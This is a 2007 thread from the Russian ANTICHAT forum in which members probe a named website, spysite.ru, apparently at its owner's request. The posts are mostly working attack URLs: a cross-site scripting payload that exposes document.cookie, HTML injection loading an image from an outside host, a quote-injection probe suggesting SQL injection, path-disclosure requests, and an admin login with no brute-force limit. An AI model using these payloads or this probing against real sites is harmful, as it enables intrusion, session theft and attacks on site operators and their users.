HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Проверка на уязвимости
Перезагрузить страницу Проверте пожалуйста
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.11.2007, 02:26
WannY
Новичок
Регистрация: 05.02.2007
Сообщений: 8
С нами: 10137926

Репутация: 3
По умолчанию
Spysite.Ru

/library.php?article=--><script>alert(document.cookie)</script>

/shop.php?shop=<br><h1><img%20src=http://anty611.jino-net.ru/antichat.ru.gif></h1><br"&sort=<br><h1>ANTICHAT.RU</h1><br"
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 11.11.2007, 07:06
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
С нами: 10489346

Репутация: 1403


По умолчанию
http://www.spysite.ru/news.php?new=i12'
 
Ответить с цитированием

  #3  
Старый 11.11.2007, 17:27
halkfild
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
С нами: 10787366

Репутация: 2277
По умолчанию
[pasкрытие путей]

http://spysite.ru/search.php?qwest[]=
http://spysite.ru/news.php?new[]=i3

http://spysite.ru/lib/kernel.php
http://spysite.ru/setup/forms.php
тут интересно, но ничего нормального выдавить не сложилось.. там инициализируется переменная может инклюд

/hsphere/local/home/spysite/spysite.ru/setup/forms.php

з.ы. в 4,5 постах этой темы описаны рабочие уязвимости
з.з.ы. зачем постить на проверку багов, если не исправлять то что найдено
з.з.з.ы. старайтесь смотреть, не писал ли кто-то эти уязвимости
 
Ответить с цитированием

  #4  
Старый 03.08.2007, 20:22
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию
1) http://www.spysite.ru/forum/admin.php
без ограничения на кол-во попыток и картинки.
2) http://www.spysite.ru/forum/tools.php?event=find&find=ok'
раскрытие пути.
 
Ответить с цитированием

  #5  
Старый 03.08.2007, 20:40
vir7v
Новичок
Регистрация: 02.08.2007
Сообщений: 12
С нами: 9881572

Репутация: 14
По умолчанию
Цитата:
Сообщение от freddi  
1) http://www.spysite.ru/forum/admin.php
без ограничения на кол-во попыток и картинки.
2) http://www.spysite.ru/forum/tools.php?event=find&find=ok'
раскрытие пути.
Принято
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Пожалуйста помогите срочно! Бурундукан Уязвимости Mail-сервис 13 07.02.2005 12:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.